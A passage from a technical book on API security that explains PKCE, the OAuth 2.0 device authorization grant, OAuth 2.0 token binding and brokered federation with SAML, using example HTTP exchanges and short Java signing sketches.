Unlike in private URI scheme, the browser verifies the identity of the claimed HTTPS URI before redirection, and for the same reason, it is recommended to use claimed HTTPS URI scheme over others where possible. Loopback Interface With this approach, your native app will listen on a given port in the device itself. In other words, your native app acts as a simple web server. For example, your redirect URI will look like http://127.0.0.1:5000/oauth2/redirect. 
Since we are using the loopback interface (127.0.0.1), when the browser sees this URL, it will hand over the control to the service listening on the mobile device on port 5000. The challenge with this approach is that your app may not be able to run on the same port on all devices, if other apps on the mobile device are already using the same port.

Proof Key for Code Exchange (PKCE)

Proof Key for Code Exchange (PKCE) is defined in the RFC 7636 as a way to mitigate the code interception attack (more details in Chapter 14) in a mobile environment. As we discussed in the previous section, when you use a custom URL scheme to retrieve the authorization code from the OAuth authorization server, there can be a case where it goes to a different app, which is also registered with the mobile device for the same custom URL scheme as the original app. An attacker can possibly do this with the intention of stealing the code. When the authorization code gets to the wrong app, that app can exchange it for an access token and then get access to the corresponding APIs. Since we use the authorization code grant with no client secret in mobile environments, and the client_id of the original app is public, the attacker has no issue exchanging the code for an access token by talking to the token endpoint of the authorization server.

Figure 10-4. A typical login flow for a native mobile app with OAuth 2.0 and PKCE

Let's see how PKCE solves the code interception attack (see Figure 10-4):
1. The native mobile app, before redirecting the user to the authorization server, generates a random value, which is called the code_verifier. The value of the code_verifier must have a minimum length of 43 characters and a maximum of 128 characters.
2. Next, the app has to calculate the SHA256 of the code_verifier and find its base64-url-encoded (see Appendix E) representation, with no padding. Since the SHA256 hashing algorithm always results in a hash of 256 bits, when you base64-url-encode it, there will be a padding all the time, which is represented by the = sign. According to the PKCE RFC, we need to remove that padding. That value, which is the SHA256-hashed, base64-url-encoded, unpadded code_verifier, is known as the code_challenge.
3. Now, when the native app initiates the authorization code request and redirects the user to the authorization server, it has to construct the request URL in the following manner, along with the code_challenge and the code_challenge_method query parameters. The code_challenge_method carries the name of the hashing algorithm.
https://idp.foo.com/authorization?client_id=FFGFGOIPI7898778&scope=openid&redirect_uri=com.foo.app:/oauth2/redirect&response_type=code&code_challenge=YzfcdAoRg7rAfj9_Fllh7XZ6BBl4PIHC-xoMrfqvWUc&code_challenge_method=S256
4. At the time of issuing the authorization code, the authorization server must record the provided code_challenge against the issued authorization code. Some authorization servers may embed the code_challenge into the code itself.
5. Once the native app gets the authorization code, it can exchange the code for an access token by talking to the authorization server's token endpoint. But, when you follow PKCE, you must send the code_verifier (corresponding to the code_challenge) along with the token request.
curl -k --user "XDFHKKJURJSHJD" -d "code=XDFHKKJURJSHJD&grant_type=authorization_code&client_id=FFGFGOIPI7898778&redirect_uri=com.foo.app:/oauth2/redirect&code_verifier=ewewewoiuojslkdjsd9sadoidjalskdjsdsdewewewoiuojslkdjsd9sadoidjalskdjsdsd" https://idp.foo.com/token
6. If the attacker's app gets the authorization code, it still cannot exchange it for an access token, because only the original app knows the code_verifier.
7. Once the authorization server receives the code_verifier along with the token request, it will find the SHA256-hashed, base64-url-encoded, unpadded value of it and compare it with the recorded code_challenge. If those two match, then it will issue the access token.

Browser-less Apps

So far in this chapter, we have only discussed mobile devices, which are capable of spinning up a web browser. There is another growing requirement to use OAuth-secured APIs from applications running on devices with input constraints and no web browser, such as smart TVs, smart speakers, printers, and so on. In this section, we discuss how to access OAuth 2.0 protected APIs from browser-less apps using the OAuth 2.0 device authorization grant. In any case, the device authorization grant does not replace any of the approaches we discussed earlier with respect to native apps running on capable mobile devices.

OAuth 2.0 Device Authorization Grant

The OAuth 2.0 device authorization grant is defined in the RFC 8628 (https://tools.ietf.org/html/rfc8628), which is published by the IETF OAuth working group. According to this RFC, a device must satisfy the following requirements to use the device authorization grant type:
• The device is already connected to the Internet or to the network, which has access to the authorization server.
• The device is able to make outbound HTTPS requests.
• The device is able to display or otherwise communicate a URI and code sequence to the user.
• The user has a secondary device (e.g., personal computer or smartphone) from which they can process a request.

Let's see how the device authorization grant works, with an example. Say we have a YouTube app running on a smart TV, and we need the smart TV to access our YouTube account on our behalf. In this case, YouTube acts as both the OAuth authorization server and the resource server, and the YouTube app running on the smart TV is the OAuth client application.
1. The user takes the TV remote and clicks the YouTube app to associate his/her YouTube account with the app.
2. The YouTube app running on the smart TV has an embedded client ID and sends a direct HTTP request over HTTPS to the authorization server.
POST /device_authorization HTTP/1.1
Host: idp.youtube.com
Content-Type: application/x-www-form-urlencoded
client_id=XDFHKKJURJSHJD

Figure 10-5. A typical login flow for a browser-less app with OAuth 2.0

3. In response to the preceding request, the authorization server returns a device_code, a user_code, and a verification URI. Both the device_code and the user_code have an expiration time associated with them, which is communicated to the client app via the expires_in parameter (in seconds).
HTTP/1.1 200 OK Content-Type: application/json Cache-Control: no-store { "device_code": "GmRhmhcxhwAzkoEqiMEg_DnyEysNkuNhszIySk9eS", "user_code": "WDJB-MJHT", "verification_uri": "https://youtube.com/device", "verification_uri_complete": "https://youtube.com/device?user_code=WDJB-MJHT", "expires_in": 1800, "interval": 5 } 4. The YouTube client app instructs the user to visit the provided verification URI (from the preceding response) and confirm the authorization request with the provided user code (from the preceding response). 5. Now the user has to use a secondary device (a laptop or mobile phone) to visit the verification URI. While that action is in progress, the YouTube app will keep polling the authorization server to see whether the user has confirmed the authorization request. The minimum amount of time the client should wait before polling or the time between polling is specified by the authorization server in the preceding response under the interval parameter. The poll request to the token endpoint of the authorization server includes three parameters. The grant_type parameter must carry the value urn:ietf:params:oauth:grant- type:device_code, so the authorization server knows how to Chapter 10 aCCessing apis via native Mobile apps 240 process this request. The device_code parameter carries the device code issued by the authorization server in its first response, and the client_id parameter carries the client identifier of the YouTube app. POST /token HTTP/1.1 Host: idp.youtube.com Content-Type: application/x-www-form-urlencoded grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Adevice_code &device_code=GmRhmhcxhwAzkoEqiMEg_DnyEysNkuNhszIySk9eS &client_id=459691054427 6. The user visits the provided verification URI, enters the user code, and confirms the authorization request. 7. Once the user confirms the authorization request, the authorization server issues the following response to the request in step 5. This is the standard response from an OAuth 2.0 authorization server token endpoint. HTTP/1.1 200 OK Content-Type: application/json;charset=UTF-8 Cache-Control: no-store Pragma: no-cache { "access_token":"2YotnFZFEjr1zCsicMWpAA", "token_type":"Bearer", "expires_in":3600, "refresh_token":"tGzv3JOkF0XG5Qx2TlKWIA", } 8. Now the YouTube app can use this access token to access the YouTube API on behalf of the user. Chapter 10 aCCessing apis via native Mobile apps 241 Summary • There are multiple grant types in OAuth 2.0; however, while using OAuth 2.0 to access APIs from a native mobile app, it is recommended to use authorization code grant type, along with Proof Key for Code Exchange (PKCE). • PKCE protects the native apps from code interception attack. • The use of browser-less devices such as smart TVs, smart speakers, printers, and so on is gaining popularity. • The OAuth 2.0 device authorization grant defines a standard flow to use OAuth 2.0 from a browser-less device and gain access to APIs. Chapter 10 aCCessing apis via native Mobile apps 243 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_11 CHAPTER 11 OAuth 2.0 Token Binding Most of the OAuth 2.0 deployments do rely upon bearer tokens. A bearer token is like “cash.” If I steal 10 bucks from you, I can use it at a Starbucks to buy a cup of coffee—no questions asked. I do not need to prove that I own the ten-dollar note. Unlike cash, if I use my credit card, I need to prove the possession. I need to prove I own it. 
I need to sign to authorize the transaction, and it’s validated against the signature on the card. The bearer tokens are like cash—once stolen, an attacker can use it to impersonate the original owner. Credit cards are like proof of possession (PoP) tokens. OAuth 2.0 recommends using Transport Layer Security (TLS) for all the interactions between the client, authorization server, and resource server. This makes the OAuth 2.0 model quite simple with no complex cryptography involved—but at the same time, it carries all the risks associated with a bearer token. There is no second level of defense. Also not everyone is fully bought into the idea of using OAuth 2.0 bearer tokens—just trusting the underlying TLS communication. I’ve met several people—mostly from the financial domain—who are reluctant to use OAuth 2.0, just because of the bearer tokens. An attacker may attempt to eavesdrop authorization code/access token/refresh token (see Chapter 4 for details) in transit from the authorization server to the client, using any of the following means: • Malware installed in the browser (public clients). • Browser history (public clients/URI fragments). • Intercept the TLS communication between the client and the authorization server or the resource server (exploiting the vulnerabilities in the TLS layer like Heartbleed and Logjam). 244 • TLS is point to point (not end to end)—an attacker having access to a proxy server could simply log all the tokens. Also, in many production deployments, the TLS connection is terminated at the edge, and from there onward, it’s either a new TLS connection or a plain HTTP connection. In either case, as soon as a token leaves the channel, it’s no more secure. Understanding Token Binding OAuth 2.0 token binding proposal cryptographically binds security tokens to the TLS layer, preventing token export and replay attacks. It relies on TLS—and since it binds the tokens to the TLS connection itself, anyone who steals a token cannot use it over a different channel. We can break down the token binding protocol into three main phases (see Figure 11-1). Figure 11-1. Three main phases in the token binding protocol Token Binding Negotiation During the negotiation phase, the client and the server negotiate a set of parameters to use for token binding between them. This is independent of the application layer protocols—as it happens during the TLS handshake (see Appendix C). We discuss more about this in the next section. The token binding negotiation is defined in the RFC 8472. Keep in mind we do not negotiate any keys in this phase, only the metadata. Chapter 11 Oauth 2.0 tOken Binding 245 Key Generation During the key generation phase, the client generates a key pair according to the parameters negotiated in the negotiation phase. The client will have a key pair for each host it talks to (in most of the cases). Proof of Possession During the proof of possession phase, the client uses the keys generated in the key generation phase to prove the possession. Once the keys are agreed upon, in the key generation phase, the client proves the possession of the key by signing the exported keying material (EKM) from the TLS connection. The RFC 5705 allows an application to get additional application-specific keying material derived from the TLS master secret (see Appendix C). The RFC 8471 defines the structure of the token binding message, which includes the signature and other key materials, but it does not define how to carry the token binding message from the client to the server. 
It’s up to the higher-level protocols to define it. The RFC 8473 defines how to carry the token binding message over an HTTP connection (see Figure 11-2). Figure 11-2. The responsibilities of each layer in a token binding flow Chapter 11 Oauth 2.0 tOken Binding 246 TLS Extension for Token Binding Protocol Negotiation To bind security tokens to the TLS connection, the client and the server need to first agree upon the token binding protocol (we’ll discuss about this later) version and the parameters (signature algorithm, length) related to the token binding key. This is accomplished by a new TLS extension without introducing additional network roundtrips in TLS 1.2 and earlier versions. The token binding protocol version reflects the protocol version defined by the Token Binding Protocol (RFC 8471)—and the key parameters are defined by the same specification itself. The client uses the Token Binding TLS extension to indicate the highest supported token binding protocol version and key parameters. This happens with the Client Hello message in the TLS handshake. To support the token binding specification, both the client and the server should support the token binding protocol negotiation extension. The server uses the Token Binding TLS extension to indicate the support for the token binding protocol and to select the protocol version and key parameters. The server that supports token binding and receives a Client Hello message containing the Token Binding extension will include the Token Binding extension in the Server Hello if the required conditions are satisfied. If the Token Binding extension is included in the Server Hello and the client supports the token binding protocol version selected by the server, it means that the version and key parameters have been negotiated between the client and the server and shall be definitive for the TLS connection. If the client does not support the token binding protocol version selected by the server, then the connection proceeds without token binding. Every time a new TLS connection is negotiated (TLS handshake) between the client and the server, a token binding negotiation happens too. Even though the negotiation happens repeatedly by the TLS connection, the token bindings (you will learn more about this later) are long-lived; they encompass multiple TLS connections and TLS sessions between a given client and server. In practice, Nginx (https://github.com/google/ngx_token_binding) and Apache (https://github.com/zmartzone/mod_token_binding) have support for token binding. An implementation of Token Binding Protocol Negotiation TLS Extension in Java is available here: https://github.com/pingidentity/java10-token-binding- negotiation. Chapter 11 Oauth 2.0 tOken Binding 247 Key Generation The Token Binding Protocol specification (RFC 8471) defines the parameters related to key generation. These are the ones agreed upon during the negotiation phase. • If rsa2048_pkcs1.5 key parameter is used during the negotiation phase, then the signature is generated using the RSASSA-PKCS1-v1_5 signature scheme as defined in RFC 3447 with SHA256 as the hash function. • If rsa2048_pss key parameter is used during the negotiation phase, then the signature is generated using the RSASSA-PSS signature scheme as defined in RFC 3447 with SHA256 as the hash function. • If ecdsap256 key parameter is used during the negotiation phase, the signature is generated with ECDSA using Curve P-256 and SHA256 as defined in ANSI.X9–62.2005 and FIPS.186–4.2013. 
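To make the key generation phase a bit more concrete, the following is a minimal Java sketch of a client generating a P-256 key pair for the ecdsap256 key parameter and signing a stand-in for the exported keying material. It is not tied to any token binding library; the EKM value is a placeholder for what a real client would export from its TLS stack (RFC 5705), and in the real protocol the signature covers the EKM together with the token binding type and the key parameters.

import java.nio.charset.StandardCharsets;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.spec.ECGenParameterSpec;

public class TokenBindingKeySketch {

    public static void main(String[] args) throws Exception {
        // Generate a P-256 key pair, matching the ecdsap256 key parameter.
        KeyPairGenerator generator = KeyPairGenerator.getInstance("EC");
        generator.initialize(new ECGenParameterSpec("secp256r1"));
        KeyPair keyPair = generator.generateKeyPair();

        // Placeholder for the exported keying material (EKM) taken from the
        // underlying TLS connection. A real client obtains this from its TLS
        // stack rather than hard-coding it.
        byte[] ekm = "ekm-from-tls-connection".getBytes(StandardCharsets.UTF_8);

        // Sign the EKM with the private key as the proof of possession.
        Signature signer = Signature.getInstance("SHA256withECDSA");
        signer.initSign(keyPair.getPrivate());
        signer.update(ekm);
        byte[] signature = signer.sign();

        System.out.println("Signature length: " + signature.length);
    }
}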
In case a browser acts as the client, then the browser itself has to generate the keys and maintain them against the hostname of the server. You can find the status of this feature development for Chrome from here (www.chromestatus.com/ feature/5097603234529280). Then again the token binding is not only for a browser, it’s useful in all the interactions between a client and a server—irrespective of the client being thin or thick. Proof of Possession A token binding is established by a user agent (or the client) generating a private/ public key pair (possibly, within a secure hardware module, such as trusted platform module (TPM)) per target server, providing the public key to the server, and proving the possession of the corresponding private key, on every TLS connection to the server. The generated public key is reflected in the token binding ID between the client and the server. At the server end, the verification happens in two steps. First, the server receiving the token binding message needs to verify that the key parameters in the message match with the token binding parameters negotiated and then validate the signature contained in the token binding message. All the key parameters and the signature are embedded into the token binding message. Chapter 11 Oauth 2.0 tOken Binding 248 The structure of the token binding message is defined in the Token Binding Protocol specification (RFC 8471). A token binding message can have multiple token bindings (see Figure 11-3). A given token binding includes the token binding ID, the type of the token binding (provided or referred—we’ll talk about this later), extensions, and the signature over the concatenation of exported keying material (EKM) from the TLS layer, token binding type, and key parameters. The token binding ID reflects the derived public key along with the key parameters agreed upon the token binding negotiation. Once the TLS connection is established between a client and a server, the EKM will be the same—both at the client end and at the server end. So, to verify the signature, the server can extract the EKM from the underneath TLS connection and use the token binding type and key parameters embedded into the token binding message itself. The signature is validated against the embedded public key (see Figure 11-3). Figure 11-3. The structure of the token binding message How to carry the token binding message from the client to the server is not defined in the Token Binding Protocol specification, but in the Token Binding for HTTP specification or the RFC 8473. In other words, the core token binding specification lets the higher-level protocols make the decision on that. The Token Binding for HTTP specification introduces a new HTTP header called Sec-Token-Binding—and it carries the base64url-encoded value of the token binding message. The Sec-Token-Binding Chapter 11 Oauth 2.0 tOken Binding 249 header field MUST NOT be included in HTTP responses—MUST include only once in an HTTP request. Once the token binding message is accepted as valid, the next step is to make sure that the security tokens carried in the corresponding HTTP connection are bound to it. Different security tokens can be transported over HTTP—for example, cookies and OAuth 2.0 tokens. In the case of OAuth 2.0, how the authorization code, access token, and refresh token are bound to the HTTP connection is defined in the OAuth 2.0 Token Binding specification (https://tools.ietf.org/html/draft-ietf-oauth-token- binding- 08). 
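The following Java sketch illustrates the server-side check described above, under heavy simplification: it base64url-decodes the Sec-Token-Binding header value and verifies the client's signature over the EKM of the server's own TLS connection. Parsing the RFC 8471 binary message structure is omitted, so the public key, signature, and EKM are assumed to be already extracted; a production deployment would rely on a server module or library such as the ones mentioned earlier.

import java.security.PublicKey;
import java.security.Signature;
import java.util.Base64;

public class TokenBindingVerifySketch {

    // Simplified view of the server-side check: the signature in the token
    // binding message must verify, with the embedded public key, over the EKM
    // of the server's own TLS connection (plus binding type and key parameters
    // in the real protocol).
    public static boolean isValidBinding(String secTokenBindingHeader,
                                         PublicKey clientPublicKey,
                                         byte[] signature,
                                         byte[] ekmFromServerTls) throws Exception {
        // The header value is base64url encoded (RFC 8473).
        byte[] tokenBindingMessage =
                Base64.getUrlDecoder().decode(secTokenBindingHeader);
        System.out.println("Token binding message length: " + tokenBindingMessage.length);

        Signature verifier = Signature.getInstance("SHA256withECDSA");
        verifier.initVerify(clientPublicKey);
        verifier.update(ekmFromServerTls);
        return verifier.verify(signature);
    }
}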
Token Binding for OAuth 2.0 Refresh Token Let’s see how the token binding works for OAuth 2.0 refresh tokens. A refresh token, unlike authorization code and access token, is only used between the client and the authorization server. Under the OAuth 2.0 authorization code grant type, the client first gets the authorization code and then exchanges it to an access token and a refresh token by talking to the token endpoint of the OAuth 2.0 authorization server (see Chapter 4 for details). The following flow assumes the client has already got the authorization code (see Figure 11-4). Figure 11-4. OAuth 2.0 refresh grant type 1. The connection between the client and the authorization server must be on TLS. 2. The client which supports OAuth 2.0 token binding, during the TLS handshake itself, negotiates the required parameters with the authorization server, which too supports OAuth 2.0 token binding. Chapter 11 Oauth 2.0 tOken Binding 250 3. Once the TLS handshake is completed, the OAuth 2.0 client will generate a private key and a public key and will sign the exported keying material (EKM) from the underlying TLS connection with the private key—and builds the token binding message. (To be precise, the client will sign EKM + token binding type + key parameters.) 4. The base64url-encoded token binding message will be added as the value to the Sec- Token- Binding HTTP header to the connection between the client and the OAuth 2.0 authorization server. 5. The client will send a standard OAuth request to the token endpoint along with the Sec-Token-Binding HTTP header. 6. The authorization server validates the value of Sec-Token-Binding header, including the signature, and records the token binding ID (which is also included in the token binding message) against the issued refresh token. To make the process stateless, the authorization server can include the hash of the token binding ID into the refresh token itself—so it does not need to remember/ store it separately. 7. Later, the OAuth 2.0 client tries to use the refresh token against the same token endpoint to refresh the access token. Now, the client has to use the same private key and public key pair used before to generate the token binding message and, once again, includes the base64url-encoded value of it to the Sec-Token-Binding HTTP header. The token binding message has to carry the same token binding ID as in the case where the refresh token was originally issued. 8. The OAuth 2.0 authorization server now must validate the Sec- Token-Binding HTTP header and then needs to make sure that the token binding ID in the binding message is the same as the original token binding ID attached to the refresh token in the same request. This check will make sure that the refresh token cannot be used outside the original token binding. In case the authorization server decides to embed the hashed value of the Chapter 11 Oauth 2.0 tOken Binding 251 token binding ID to the refresh token itself, now it has to calculate the hash of the token binding ID in the Sec-Token-Binding HTTP header and compare it with what is embedded into the refresh token. 9. If someone steals the refresh token and is desperate to use it outside the original token binding, then he/she also has to steal the private/public key pair corresponding to the connection between the client and the server. There are two types of token bindings—and what we discussed with respect to the refresh token is known as provided token binding. 
This is used when the token exchange happens directly between the client and the server. The other type is known as referred token binding, which is used when requesting tokens, which are intended to present to a different server—for example, the access token. The access token is issued in a connection between the client and the authorization server—but used in a connection between the client and the resource server. Token Binding for OAuth 2.0 Authorization Code/Access Token Let’s see how the token binding works for access tokens, under the authorization code grant type. Under the OAuth 2.0 authorization code grant type, the client first gets the authorization code via the browser (user agent) and then exchanges it to an access token and a refresh token by talking to the token endpoint of the OAuth 2.0 authorization server (see Figure 11-5). Chapter 11 Oauth 2.0 tOken Binding 252 1. When the end user clicks the login link on the OAuth 2.0 client application on the browser, the browser has to do an HTTP GET to the client application (which is running on a web server), and the browser has to establish a TLS connection with the OAuth 2.0 client first. The browser, which supports OAuth 2.0 token binding, during the TLS handshake itself, negotiates the required parameters with the client application, which too supports OAuth 2.0 token binding. Once the TLS handshake is completed, the browser will generate a private key and public key (for the client domain) and will sign the exported keying material (EKM) from the underlying TLS connection with the private key—and builds the token binding message. The base64url-encoded token binding message will be added as the value to the Sec-Token-Binding HTTP header to the connection between the browser and the OAuth 2.0 client—which is the HTTP GET. 2. In response to step 1 (assuming all the token binding validations are done), the client will send a 302 response to the browser, asking to redirect the user to the OAuth 2.0 authorization server. Also in the response, the client will include the HTTP header Include- Referred-Token-Binding-ID, which is set to true. This instructs the Figure 11-5. OAuth 2.0 authorization code flow Chapter 11 Oauth 2.0 tOken Binding 253 browser to include the token binding ID established between the browser and the client in the request to the authorization server. Also, the client application will include two additional parameters in the request: code_challenge and code_challenge_method. These parameters are defined in the Proof Key for Code Exchange (PKCE) or RFC 7636 for OAuth 2.0. Under token binding, these two parameters will carry static values, code_challenge=referred_tb and code_challenge_method=referred_tb. 3. The browser, during the TLS handshake itself, negotiates the required parameters with the authorization server. Once the TLS handshake is completed, the browser will generate a private key and public key (for the authorization server domain) and will sign the exported keying material (EKM) from the underlying TLS connection with the private key—and builds the token binding message. The client will send the standard OAuth request to the authorization endpoint along with the Sec-Token- Binding HTTP header. This Sec-Token-Binding HTTP header now includes two token bindings (in one token binding message—see Figure 11-3), one for the connection between the browser and the authorization server, and the other one is for the browser and the client application (referred binding). 4. 
The authorization server redirects the user back to the OAuth client application via browser—along with the authorization code. The authorization code is issued against the token binding ID in the referred token binding. 5. The browser will do a POST to the client application, which also includes the authorization code from the authorization server. The browser will use the same token binding ID established between itself and the client application—and adds the Sec-Token- Binding HTTP header. 6. Once the client application gets the authorization code (and given that the Sec- Token- Binding validation is successful), it will now talk to the authorization server’s token endpoint. Chapter 11 Oauth 2.0 tOken Binding 254 Prior to that, the client has to establish a token binding with the authorization server. The token request will also include the code_verifier parameter (defined in the PKCE RFC), which will carry the provided token binding ID between the client and the browser—which is also the token binding ID attached to the authorization code. Since the access token, which will be issued by the authorization server, is going to be used against a protected resource, the client has to include the token binding between itself and the resource server into this token binding message as a referred binding. Upon receiving the token request, the OAuth 2.0 authorization server now must validate the Sec-Token-Binding HTTP header and then needs to make sure that the token binding ID in the code_verifier parameter is the same as the original token binding ID attached to the authorization code at the point of issuing it. This check will make sure that the code cannot be used outside the original token binding. Then the authorization server will issue an access token, which is bound to the referred token binding, and a refresh token, which is bound to the connection between the client and the authorization server. 7. The client application now invokes an API in the resource server passing the access token. This will carry the token binding between the client and the resource server. 8. The resource server will now talk to the introspection endpoint of the authorization server—and it will return back the binding ID attached to the access token, so the resource server can check whether it’s the same binding ID used between itself and the client application. TLS Termination Many production deployments do include a reverse proxy—which terminates the TLS connection. This can be at an Apache or Nginx server sitting between the client and the server. Once the connection is terminated at the reverse proxy, the server has no clue what happened at the TLS layer. To make sure the security tokens are bound to the Chapter 11 Oauth 2.0 tOken Binding 255 incoming TLS connection, the server has to know the token binding ID. The HTTPS Token Binding with TLS Terminating Reverse Proxies, the draft specification (https:// tools.ietf.org/html/draft-ietf-tokbind-ttrp-09), standardizes how the binding IDs are passed from the reverse proxy to the back-end server, as HTTP headers. The Provided-Token-Binding-ID and Referred-Token-Binding-ID HTTP headers are introduced by this specification (see Figure 11-6). Figure 11-6. The reverse proxy passes the Provided-Token-Binding-ID and Referred-Token-Binding-ID HTTP headers to the backend server Summary • OAuth 2.0 token binding proposal cryptographically binds security tokens to the TLS layer, preventing token export and replay attacks. 
• Token binding relies on TLS—and since it binds the tokens to the TLS connection itself, anyone who steals a token cannot use it over a different channel. • We can break down the token binding protocol into three main phases: negotiation phase, key generation phase, and proof of possession phase. • During the negotiation phase, the client and the server negotiate a set of parameters to use for token binding between them. • During the key generation phase, the client generates a key pair according to the parameters negotiated in the negotiation phase. • During the proof of possession phase, the client uses the keys generated in the key generation phase to prove the possession. Chapter 11 Oauth 2.0 tOken Binding 257 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_12 CHAPTER 12 Federating Access to APIs One of the research performed by Quocirca (analyst and research company) confirms that many businesses now have more external users who interact with enterprise applications than internal ones. In Europe, 58% of businesses transact directly with users from other firms and/or consumers. In the United Kingdom alone, the figure is 65%. If you look at recent history, most enterprises today grow via acquisitions, mergers, and partnerships. In the United States alone, the volume of mergers and acquisitions totaled $865.1 billion in the first nine months of 2013, according to Dealogic. That’s a 39% increase over the same period of the previous year and the highest nine-month total since 2008. What does this mean for securing APIs? You need to have the ability to deal with multiple heterogeneous security systems across borders. Enabling Federation Federation, in the context of API security, is about propagating user identities across distinct identity management systems or distinct enterprises. Let’s start with a simple use case where you have an API exposed to your partners. How would you authenticate users for this API from different partners? These users belong to the external partners and are managed by them. HTTP Basic authentication won’t work. You don’t have access to the external users’ credentials, and, at the same time, your partners won’t expose an LDAP or a database connection outside their firewall to external parties. Asking for usernames and passwords simply doesn’t work in a federation scenario. Would OAuth 2.0 work? To access an API secured with OAuth, the client must present an access token issued by the owner of the API or issued by an entity that your API trusts. Users from external parties have to authenticate first with the OAuth authorization server that the API trusts and then obtain an access token. Ideally, the authorization server the API trusts is from the same domain as the API. Neither the authorization code grant type nor the implicit grant type mandates how to authenticate users at the authorization server. It’s up to the authorization server to 258 decide. If the user is local to the authorization server, then it can use a username and password or any other direct authentication protocol. If the user is from an external entity, then you have to use some kind of brokered authentication. Brokered Authentication With brokered authentication, at the time of authentication, the local authorization server (running in the same domain as the API) does not need to trust each and every individual user from external parties. Instead, it can trust a broker from a given partner domain (see Figure 12-1). 
Each partner should have a trust broker whose responsibility is to authenticate its own users (possibly through direct authentication) and then pass the authentication decision back to the local OAuth authorization server in a reliable and trusted manner. In practice, an identity provider running in the user’s (in our case, the partner employees’) home domain plays the role of a trust broker. Figure 12-1. Brokered authentication for OAuth client applications Chapter 12 Federating aCCess to apis 259 The trust relationship between the brokers from partners and the local OAuth authorization server (or between two federation domains) must be established out of band. In other words, it has to be established with a prior agreement between two parties. In most scenarios, trust between different entities is established through X.509 certificates. Let’s walk through a sample brokered authentication use case. Going back to OAuth principles, you need to deal with four entities in a federation scenario: the resource owner, the resource server, the authorization server, and the client application. All these entities can reside in the same domain or in different ones. Let’s start with the simplest scenario first. The resource owner (user), resource server (API gateway), and authorization server are in a single domain, and the client application (web app) is in a different domain. For example, you’re an employee of Foo Inc. and want to access a web application hosted by Bar Inc. (see Figure 12-1). Once you log in to a web application at Bar Inc., it needs to access an API hosted in Foo Inc. on your behalf. Using OAuth terminology, you’re the resource owner, and the API is hosted in the resource server. Both you and API are from the Foo domain. The web application hosted by Bar Inc. is the OAuth client application. Figure 12-1 illustrates how brokered authentication works for an OAuth client application. • The resource owner (user) from Foo Inc. visits the web application at Bar Inc. (step 1). • To authenticate the user, the web application redirects the user to the OAuth authorization server at Foo Inc., which is also the home domain of the resource owner (step 2). To use the OAuth authorization code grant type, the web application also needs to pass its client ID along with the authorization code grant request during the redirection. At this time, the authorization server won’t authenticate the client application but only validates its existence. In a federation scenario, the authorization server does not need to trust each and every individual application (or OAuth client); rather, it trusts the corresponding domain. The authorization server accepts authorization grant requests from any client that belongs to a trusted domain. This also avoids the cost of client registration. You don’t need to register each client application from Bar Inc.—instead, you can build a trust relationship between the authorization server from Chapter 12 Federating aCCess to apis 260 Foo Inc. and the trust broker from Bar Inc. During the authorization code grant phase, the authorization server only needs to record the client ID. It doesn’t need to validate the client’s existence. Note the oauth client identifier (id) isn’t treated as a secret. it’s publicly visible to anyone. • Once the client application gets the authorization code from the authorization server (step 3), the next step is to exchange it for a valid access token. This step requires client authentication. 
• Because the authorization server doesn’t trust each individual application, the web application must first authenticate to its own trust broker in its own domain (step 4) and get a signed assertion (step 5). This signed assertion can be used as a token of proof against the authorization server in Foo Inc. • The authorization server validates the signature of the assertion and, if it’s signed by an entity it trusts, returns the corresponding access token to the client application (steps 6 and 7). • The client application can use the access token to access the APIs in Foo Inc. on behalf of the resource owner (step 8), or it can talk to a user endpoint at Foo Inc. to get more information about the user. Note the definition of assertion, according to the oxford english dictionary, is “a confident and forceful statement of fact or belief.” the fact or belief here is that the entity that brings this assertion is an authenticated entity at the trust broker. if the assertion isn’t signed, anyone in the middle can alter it. once the trust broker (or the asserting party) signs the assertion with its private key, no one in the middle can alter it. if it’s altered, any alterations can be detected at the authorization server during signature validation. the signature is validated using the corresponding public key of the trust broker. Chapter 12 Federating aCCess to apis 261 Security Assertion Markup Language (SAML) Security Assertion Markup Language (SAML) is an OASIS standard for exchanging authentication, authorization, and identity-related data between interested parties in an XML-based data format. SAML 1.0 was adopted as an OASIS standard in 2002, and in 2003 SAML 1.1 was ratified as an OASIS standard. At the same time, the Liberty Alliance donated its Identity Federation Framework to OASIS. SAML 2.0 became an OASIS standard in 2005 by converging SAML 1.1, Liberty Alliance’s Identity Federation Framework, and Shibboleth 1.3. SAML 2.0 has four basic elements: • Assertions: Authentication, Authorization, and Attribute assertions. • Protocol: Request and Response elements to package SAML assertions. • Bindings: How to transfer SAML messages between interested parties. HTTP binding and SOAP binding are two examples. If the trust broker uses a SOAP message to transfer a SAML assertion, then it has to use the SOAP binding for SAML. • Profiles: How to aggregate the assertions, protocol, and bindings to address a specific use case. A SAML 2.0 Web Single Sign-On (SSO) profile defines a standard way to establish SSO between different service providers via SAML. Note the blog post at http://blog.facilelogin.com/2011/11/depth- of- saml-saml-summary.html provides a high-level overview of saML. SAML 2.0 Client Authentication To achieve client authentication with the SAML 2.0 profile for OAuth 2.0, you can use the parameter client_assertion_type with the value urn:ietf:params:oauth:client- assertion- type:saml2-bearer in the access token request (see step 6 in Figure 12-1). The OAuth flow starts from step 2. Chapter 12 Federating aCCess to apis 262 Now let’s dig into each step. 
